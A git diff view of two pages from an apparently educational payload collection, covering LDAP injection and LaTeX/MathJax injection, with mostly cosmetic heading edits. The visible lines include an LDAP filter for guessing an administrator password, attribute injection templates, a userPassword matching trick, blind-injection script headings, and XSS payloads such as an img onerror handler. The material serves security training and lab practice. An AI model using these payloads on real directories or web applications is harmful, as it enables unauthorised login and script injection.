(&(sn=administrator)(password=MYKE)) : OK
|
||||
```
|
||||
|
||||
**LDAP Filter Breakdown**
|
||||
|
||||
## Defaults attributes
|
||||
* `&`: Logical AND operator, meaning all conditions inside must be true.
|
||||
* `(sn=administrator)`: Matches entries where the sn (surname) attribute is administrator.
|
||||
* `(password=X*)`: Matches entries where the password starts with X (case-sensitive). The asterisk (*) is a wildcard, representing any remaining characters.
|
||||
|
||||
|
||||
## Defaults Attributes
|
||||
|
||||
Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
|
||||
|
||||
@ -100,7 +88,7 @@ commonName
|
||||
```
|
||||
|
||||
|
||||
## Exploiting userPassword attribute
|
||||
## Exploiting userPassword Attribute
|
||||
|
||||
`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
|
||||
In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
|
||||
@ -115,7 +103,7 @@ userPassword:2.5.13.18:=\xx\xx\xx
|
||||
|
||||
## Scripts
|
||||
|
||||
### Discover valid LDAP fields
|
||||
### Discover Valid LDAP Fields
|
||||
|
||||
```python
|
||||
#!/usr/bin/python3
|
||||
@ -136,7 +124,7 @@ for i in world:
|
||||
print(fields)
|
||||
```
|
||||
|
||||
### Special blind LDAP injection (without "*")
|
||||
### Special Blind LDAP Injection
|
||||
|
||||
```python
|
||||
#!/usr/bin/python3
|
||||
@ -176,7 +164,6 @@ end
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Labs
|
||||
|
||||
* [Root Me - LDAP injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/LDAP-injection-Authentication)
|
||||
|
@ -10,6 +10,7 @@
|
||||
* [Write File](#write-file)
|
||||
* [Command Execution](#command-execution)
|
||||
* [Cross Site Scripting](#cross-site-scripting)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
@ -121,7 +122,7 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
|
||||
\href{javascript:alert(1)}{placeholder}
|
||||
```
|
||||
|
||||
in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html)
|
||||
In [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html)
|
||||
|
||||
```tex
|
||||
\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}
|
||||
@ -131,7 +132,7 @@ in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.htm
|
||||
## Labs
|
||||
|
||||
* [Root Me - LaTeX - Input](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Input)
|
||||
* [Root Me - LaTeX - Command execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution)
|
||||
* [Root Me - LaTeX - Command Execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution)
|
||||
|
||||
|
||||
## References
|
||||
|
Loading…
Reference in New Issue
Block a user